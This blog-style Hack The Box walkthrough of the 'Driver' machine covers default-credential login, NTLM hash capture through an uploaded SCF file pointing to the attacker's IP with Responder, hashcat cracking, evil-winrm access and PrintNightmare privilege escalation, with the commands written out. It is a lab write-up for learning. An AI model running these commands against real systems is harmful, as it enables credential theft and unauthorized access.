Jan 29
HTB: Driver
Hello everyone, this is my third time on writing a report about hack the box. I’m sorry if there are any mistakes that I made in this walkthrough.
Enumeration
First thing to do is enumerating the machine. I use nmap to enumerate all open ports.
nmap -sV -sC -O -p- -T4 10.10.11.106
There are 4 open ports with service. Port 80 for HTTP, port 135 for MS RPC, port 445 for SMB, and port 5985 for WinRM. So, I go to port 80 and find that the website needs authorization. I use default credentials such as admin:admin1, admin:admin, administrator:password, etc. And luckily find the authorization among these default credentials.
This is the main webpage. Let’s search for interesting feature.
From here, I find that we can upload something to the server.
Let’s give a shot. I try to upload test file.
And it successfully uploaded.
Gaining Access
From here, I know that we can upload a file and the server will store it using samba protocol on port 445. Searching on google and there are several websites recommends me using some of techniques. First, I will try with eternalblue using metasploit.
Setting some options to target.
And run it.
It seems SMB not vulnerable to eternalblue exploit using metasploit. Then, I try to psexec exploit using metasploit.
Again, it is not vulnerable to psexec exploit. I don’t really know what’s wrong. After awhile, I find this website that suggests me to capture the NTLM (New Technology LAN Manager) Hash. So, I use this tool to make a “scf” file and set up a responder to catch hashes that being thrown back to us.
python3 ntlm_theft.py -f config -g scf -s 10.10.16.27(my ip)
Setting up the responder that listens to tun0 as interface.
responder -I tun0
Uploading the scf file.
Then, after finished the upload, I clicked browse and it returns hashes.
Dehashing it using hashcat so I can get the credentials.
hashcat -m 5600 hash.txt rockyou.txt — force -O
And find that liltony as the password and TONY as username. Then I use evil-winrm to login.
evil-winrm -i 10.10.11.106(target) -u TONY(username) -p liltony(password) -P 5985(port)
And I successfully gain the access. Enumerating the system and I find user.txt inside the Desktop folder.
Privilege Elevation
Then I try to enumerate for exploits using winPEAS. First, I upload the bat version of winPEAS. Using “upload” keyword to upload things through evil-winrm.
upload /directory/winPEASbat
Run it.
And I found nothing from winPEASbat, then I try winPEASexe.
Found some username with administrator privilege.
And found some of this open ports running locally.
After searching in internet, I find this exploits, CVE-2021–34527 and CVE-2021–1675. Download the CVE-2021–1675 script and upload it.
Then, I import modules from this CVE file and invoke the module.
After that, I try to login using username adm1n and password P@ssw0rd.
And successfully got the administrator privilege. Enumerating a while and find root.txt.
Conclusion
There are many ways to gain access and elevate the root. CVSS of this box is critical with 9.9 as score assuming this is real website. Please correct me if I’m wrong and please send me messages if there are any mistakes along the walkthrough.
Thank you for reading my report, hope this helps you or do anything good :D
Have a great day!
